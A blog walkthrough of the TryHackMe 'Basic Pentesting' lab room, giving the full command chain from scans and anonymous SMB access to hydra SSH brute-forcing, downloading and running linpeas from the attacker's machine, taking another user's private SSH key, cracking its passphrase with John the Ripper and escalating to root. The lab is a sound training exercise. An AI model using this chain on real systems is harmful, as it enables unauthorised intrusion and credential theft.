This writeup is the first in my TryHackME writeup series. I've carefully been dipping my toes into pentesting lately and love to keep notes so I figured I'd write them out.
This is a writeup for Basic Pentesting
nb: I'm going to assume you're running Kali Linux and you're working from an empty folder you made for this room.
Basic Pentesting
Let's take a look at this room. We're going to deploy the server and connect using OpenVPN. For more info on how to do that, visit the OpenVPN room. We'll skill all questions that don't need an answer.
Nmap setup
In order to figure out which services are running on the server we've been given, we're going to run nmap. It's going to be useful to scan with our default safe scripts, so our command will look a little like this:
nmap -sV -sC <ip>
We might need this information later, so let's make sure we save it somewhere. I like to put all my scans in a single directory in my work folder, so let's mkdir scans and then output our nmap scan to a file in that folder:
nmap -sV -sC -oN scans/nmap <ip>
Gobuster setup
Visiting the IP we've been given in our browser, we can see that it's running an Apache server, so it's going to be worth looking around to see which folders live on this server. It just so happens we'll need that information for question #3 as well. To find hidden folders, we're going to be running gobuster. A simple dir scan with gobuster should be enough to get the information we need to get going. We're going to be using the 2.3-medium wordlist from dirbuster for this, which should already be on your Kali install.
gobuster dir \
-u http://<ip>/ \
-w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt \
-o scans/gobuster
Question 3
If we let our gobuster run for a while, we'll find our hidden directory. Let's fill that in and take a look in the folder. There are two files there. One of them mentions that a user referred to as "J" has a weak password. Let's make sure we remember that! Let's save both of these files for later reference.
Questions 4 & 5
We're told to brute force for a username and password. I don't like brute forcing for usernames, it feels inefficient. Of course we already know we have two people who use this server, so we could just guess names. That too is inefficient, so let's do a little more digging.
If we open our nmap scan, we can see that Samba is running on this server. Let's go see if we can connect to the Samba server as an anonymous user.
smbclient //<IP>/anonymous
Sure enough, we're connected! Now we just need to find out what's in this folder, if anything. When run a quick ls, we can see that there's a staff.txt file. Let's get staff.txt and see what's in it!
Exiting the smb connection, we can take a look at the staff.txt file.
Announcement to staff:
PLEASE do not upload non-work-related items to this share. I know it's all in fun, but
this is how mistakes happen. (This means you too, Jan!)
-Kay
Great, we now know that the two users we are going to try to hack are called Jan and Kay. If we think back to what we found in that hidden directory, we can assume that Jan has a weak password. Let's see if he is in fact the user we're looking for in question 5 and start cracking his password.
Question 6 & 7
Cracking this weak password is going to easy. We'll be using hydra to do all the work for us, and we'll use the rockyou.txt wordlist. There is an entire room to learn about hydra so we'll skip teaching you that and just run the command:
hydra -l jan -P /usr/share/wordlists/rockyou.txt <IP> ssh
This might take a couple minutes, so sit back and let hydra do the work for you. After a while, hydra will come back with a password we can use to connect to the server with SSH.
Question 8
Once connected, we'll want to escalate our privileges on this server so we can access anything we want to. We kind of already know who the other user of this server is, but let's check the /etc/passwd file to make sure!
cat /etc/passwd
Among the users listed there, we'll find the answer to question 9. Let's see if we can escalate our privileges to get access to that user.
Questions 10 & 11
I tend to use linpeas to look for ways to escalate my privileges on a server, so we're going to do the same. Not because it's necessary on this server, but because it's really useful to learn how to do.
First, we're going to want to be in the /var/tmp folder, where we have write access so run cd /var/tmp.
Then we'll need to somehow download the linpeas.sh file onto the server. Make sure you download a copy to your own computer first from The Github repo and put it in your project folder. From there, we'll setup a simple HTTP server with Python. Simply run python -m SimpleHTTPServer in your project directory and you'll have a webserver running on port 8000.
From the server, we're going to now download the linpeas.sh file and run it to find possible privilege escalation methods that will work on this server. So let's run wget http://<YOUR OWN IP>:8000/linpeas.sh which downloads the file, and then chmod +x linpeas.sh to make the file executable. Now run ./linpeas.sh and see what it comes up with.
Looking through the linpeas results, we can see that the other user has an .ssh folder with an id_rsa key in there. We might be able to use that so let's make sure we grab that file and put it on our own computer. We'll just cat /home/<other_user>/.ssh/id_rsa, copy all of that and put it in an id_rsa file in our project directory. Because we want to be able to use it to connect to a server, we need to set the proper rights for that file. So run chmod 600 id_rsa and then try to connect to the server using
ssh -i id_rsa <other_user>@<IP>
Oh. A passphrase. We have yet to find that, but that's okay. Maybe we can just crack the id_rsa file to find the passphrase. Let's use John the Ripper for this. First, we need to turn this id_rsa file into something John can crack. Let's run /usr/share/john/ssh2john.py id_rsa crack to put the crack-able information in the crack file.
From there, we're going to crack this file with John the Ripper, using the rockyou.txt wordlist again. I won't go into the specifics for John the Ripper as there are plenty resources out there for that. Here's the command we're going to run:
john crack --wordlist=/usr/share/wordlists/rockyou.txt
This almost instantly comes back with our passphrase, which we can now use to connect to our server. We run our ssh command again, and now we fill in the passphrase we got from John.
ssh -i id_rsa <other_user>@<IP>
We're in! When we take a look at the files in our home folder, we see that there's a file called pass.bak. That's convenient! Let's open it using cat and fill in the answer to question 11!
Bonus
As a little bonus, we can check what kind of access we have. Maybe we just want to be root at this point. Running sudo -l shows us we have access to all commands as root. Well that's easy, let's make ourselves root then!
sudo su
There we go. Now we're root. There's a little surprise waiting for you in /root/root.txt so go check that out!
Top comments (2)
You should check out: John Hammond
Very similar techniques in his going through videos on youtube: youtube.com/watch?v=xl2Xx5YOKcI
I actually got to THM through John Hammond's videos!